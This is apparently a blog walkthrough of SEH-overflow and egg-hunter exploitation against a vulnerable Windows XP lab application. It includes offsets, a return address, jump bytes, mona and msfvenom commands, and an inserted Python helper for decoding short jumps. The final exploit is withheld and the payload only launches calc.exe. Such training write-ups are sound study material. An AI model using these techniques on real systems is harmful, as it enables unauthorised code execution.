As the OSCP PWK course only covered basic stack-based overflow exploitation, I decided to learn about SEH overflows and the concept of egg hunters!
I will not be talking about the theory behind those 2 in this post.
Instead, I will be writing up how to exploit them.
I will re-write the existing exploit from scratch and hopefully it might be helpful to some of you haxxers out there!
Understanding of Buffer Overflows (Simple stack based)
Configured Immunity Debugger and Mona.py
Read up on nSEH/SEH Overflow concepts
Read up on EggHunter concepts
Existing exploit available at –
Vulnerable application that we are attacking –
My target VM:
Windows XP SP3
My attacking VM:
Set up with Immunity Debugger and Mona.py
The application crashes when it is sent a junk buffer of 4500 bytes.
After sending the 4500-byte junk buffer, press Shift + F9 to pass the exception to the program and you should see that the EIP register is overwritten with "A"s.
pattern_create.rb -l 4500
pattern_offset.rb -q $overwritten_eip_value
offset = 4065
Subtract 4 from that offset: the 4 bytes at offset 4061 are the nSEH field and the 4 bytes at offset 4065 are the SEH handler, which we overwrite with "C"s.
Your exploit PoC should look something like this:
junk = "A" * 4061 + "B" * 4 + "C" * 4 + "D" * 431
"B" -> nSEH
"C" -> SEH
Launch the exploit PoC; it should trigger an access violation. Pass it with Shift + F9 and you should notice that EIP is overwritten with 43434343 ("C" * 4).
Now we need the address of a POP POP RETN sequence so that execution returns into our "B" * 4 (nSEH) buffer. Run "!mona seh" in the Immunity Debugger console.
mona writes its output file (seh.txt) into your Immunity Debugger folder (for example C:\Program Files\Immunity Inc\Immunity Debugger).
The file lists all the POP POP RET addresses it found; choose one that does not contain any bad bytes such as \x00.
I decided on the address 0x1002379d
Replace the “C” * 4 with the PPR address that you have chosen
Restart the application in Immunity Debugger with CTRL + F2, go to your PPR address 1002379d and set a breakpoint there.
Rerun your updated PoC exploit. Press Shift + F9 to pass the exception first, then step through the POP POP RETN instructions with F7; you should end up at the "B" * 4 bytes.
Now we need to jump backward into our "A" buffer.
"\xEB\xC4\x90\x90" is a short jump of -60 bytes: 0xEB is JMP rel8 and 0xC4 is -60 as a signed byte (type -60 into the calculator in hex mode to see it), followed by two NOPs as padding.
Update your PoC exploit and replace the "B" * 4 with "\xEB\xC4\x90\x90".
Your PoC exploit should look something like this.
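Why the byte 0xC4 means "60 bytes back" is the one thing in this step that trips people up, so here is an added example (my own illustration, not code from the original post) that decodes and encodes the rel8 displacement of a short JMP and computes where it lands. One caveat the post glosses over: the CPU adds the displacement to the address of the next instruction, so a JMP rel8 at address X with displacement -60 lands at X + 2 - 60 = X - 58, which is still well inside the "A" buffer that precedes nSEH. The address 0x1000 used below is a constructed placeholder, not a real address from the target.

```python
# Added example: decode/encode the rel8 displacement of an x86 short JMP (0xEB rel8).
# The displacement is a signed 8-bit two's complement value relative to the END of
# the 2-byte instruction, i.e. target = jmp_address + 2 + rel8.

JMP_REL8_OPCODE = 0xEB
INSTRUCTION_LENGTH = 2  # opcode byte + one displacement byte


def decode_rel8(rel8_byte: int) -> int:
    """Interpret one byte as a signed 8-bit two's complement displacement."""
    if not 0 <= rel8_byte <= 0xFF:
        raise ValueError("rel8 must be a single byte")
    return rel8_byte - 256 if rel8_byte & 0x80 else rel8_byte


def encode_rel8(displacement: int) -> int:
    """Encode a signed displacement (-128..127) as the byte that follows 0xEB."""
    if not -128 <= displacement <= 127:
        raise ValueError("displacement out of range for a short jump")
    return displacement & 0xFF


def short_jmp_target(jmp_address: int, instruction: bytes) -> int:
    """Return the address a short JMP at jmp_address transfers control to."""
    if len(instruction) < INSTRUCTION_LENGTH or instruction[0] != JMP_REL8_OPCODE:
        raise ValueError("not a short JMP (expected 0xEB rel8)")
    return jmp_address + INSTRUCTION_LENGTH + decode_rel8(instruction[1])


if __name__ == "__main__":
    # Constructed sample: the post's nSEH bytes placed at a placeholder address.
    nseh = b"\xEB\xC4\x90\x90"
    placeholder_address = 0x1000
    print(f"rel8 0x{nseh[1]:02X} decodes to {decode_rel8(nseh[1])}")
    print(f"-60 encodes to 0x{encode_rel8(-60):02X}")
    print(f"JMP at 0x{placeholder_address:X} lands at "
          f"0x{short_jmp_target(placeholder_address, nseh):X}")
```

Run it and you will see that the displacement byte round-trips (0xC4 decodes to -60, -60 encodes to 0xC4) and that the jump lands 58 bytes before the JMP itself, not 60; with 4061 bytes of "A"s in front of nSEH there is plenty of room either way.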
Set a breakpoint at your chosen PPR address again and rerun your updated PoC exploit. Press Shift + F9 to pass the exception first, then step with F7 through the POP POP RETN; you should end up at the former "B" * 4 bytes, which are now "\xEB\xC4\x90\x90" (jump backward 60 bytes). Stepping once more should land you in the "A" buffer.
The "\xEB\xC4\x90\x90" as shown in Immunity Debugger.
Stepping with F7 should land you in the "A" buffer.
Nice. You are all set to send your egg hunter, egg tag, shellcode and everything else in one go!
Generate your egg hunter with the following command in the Immunity Debugger console (p0rn is the tag it will search for):
!mona egg -t p0rn
Copy and paste the generated 32-byte egg hunter into your PoC exploit.
Generate your shellcode with msfvenom:
msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c
Your final exploit PoC should look something like this:
All is set, embrace teh calculator!
Note that there are other ways to pwn this application. Just having my own way of fun.
I have decided to exclude my full exploit code so that you can try it out yourself!
I know that SEH Overflows and Egg Hunter concept are obsolete. But…… It is always good to learn new stuff! Well at least for me.
Stay safe people!